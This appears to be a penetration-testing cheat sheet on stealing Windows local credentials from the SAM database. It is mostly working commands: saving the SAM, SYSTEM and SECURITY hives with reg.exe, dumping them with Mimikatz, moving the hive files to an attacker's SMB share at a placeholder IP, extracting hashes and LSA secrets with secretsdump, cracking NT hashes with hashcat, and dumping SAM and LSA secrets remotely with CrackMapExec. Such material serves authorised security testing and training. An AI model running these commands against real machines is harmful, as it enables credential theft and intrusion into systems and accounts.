# Attacking SAM

### **Copying SAM Registry Hives**

There are three registry hives worth copying once we have local admin access on the target (`reg.exe save` calls `RegSaveKey`, which needs the SeBackupPrivilege that local administrators hold; the SAM key itself is not readable by administrators through its ACL, so the backup path is what makes the copy possible). Each hive has a specific role when we get to dumping and cracking the hashes:

| Registry Hive | Description                                                                                                                                                                                      |
| ------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| hklm\sam      | Contains the LM/NT hashes of local account passwords. We need these to crack them offline (or to pass the hash) and recover the local account passwords in cleartext.                              |
| hklm\system   | Contains the system bootkey, which protects the SAM database. Without it the SAM hive cannot be decrypted, so it must always be copied alongside hklm\sam.                                         |
| hklm\security | Contains LSA secrets (service account passwords, auto-logon credentials, DPAPI_SYSTEM) and cached domain logon credentials (DCC2). Worth taking on a domain-joined target; it also needs hklm\system. |

### Dumping SAM with Mimikatz

`lsadump::sam` reads the SAM and SYSTEM keys from the live registry, which only SYSTEM can open, so run it from an elevated session and impersonate SYSTEM first:

```bash
token::elevate
lsadump::sam
```

### **Using reg.exe save to Copy Registry Hives**

```bash
# On the target (elevated cmd.exe). reg save writes a binary hive file;
# it fails if the destination already exists, so pick fresh names.
reg.exe save hklm\sam C:\sam.save

reg.exe save hklm\system C:\system.save

reg.exe save hklm\security C:\security.save

# Send the saved files to our system.
# On the attack host: start an SMB server exposing the current directory
# as a share called "share" (any name works; -smb2support lets modern
# Windows clients connect).
smbserver.py -smb2support share .

# Back on the target: move the saved hives to the share.
# <attacker-ip> is the attack host's IP address.
move C:\sam.save \\<attacker-ip>\share\
move C:\system.save \\<attacker-ip>\share\
move C:\security.save \\<attacker-ip>\share\
```

### **Dumping Hashes with Impacket's secretsdump.py**

```bash
# Dump hashes offline from the transferred files. LOCAL tells secretsdump to
# parse the hive files instead of connecting to a host. Output includes the
# SAM hashes (user:rid:lmhash:nthash:::), LSA secrets and, on a domain-joined
# box, cached domain credentials ($DCC2$...) which hashcat cracks with -m 2100.
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
```

### **Cracking Hashes with Hashcat**

```bash
# secretsdump prints one line per local account as
#   username:rid:lmhash:nthash:::
# The fourth field is the NT hash; collect those into a .txt file, one per line.

# Crack NT hashes with hashcat (mode 1000 = NTLM)
sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt

# Show what was cracked afterwards (results are stored in the potfile)
sudo hashcat -m 1000 hashestocrack.txt --show
```

### **Remote Dumping & LSA Secrets Considerations**

If we already hold local admin credentials, the hives do not have to be copied by hand: CrackMapExec reads them over SMB through the remote registry service and dumps them in secretsdump format. `--local-auth` authenticates as a local account rather than a domain one. The same flags work unchanged in NetExec (`nxc`), the maintained fork of CrackMapExec.

### **Dumping LSA Secrets Remotely**

```bash
# LSA secrets and cached domain credentials (SECURITY + SYSTEM hives)
crackmapexec smb <ip> --local-auth -u eren -p pass --lsa
```

### **Dumping SAM Remotely**

```bash
# Local account hashes (SAM + SYSTEM hives), printed as user:rid:lmhash:nthash:::
crackmapexec smb <ip> --local-auth -u eren -p pass --sam
```
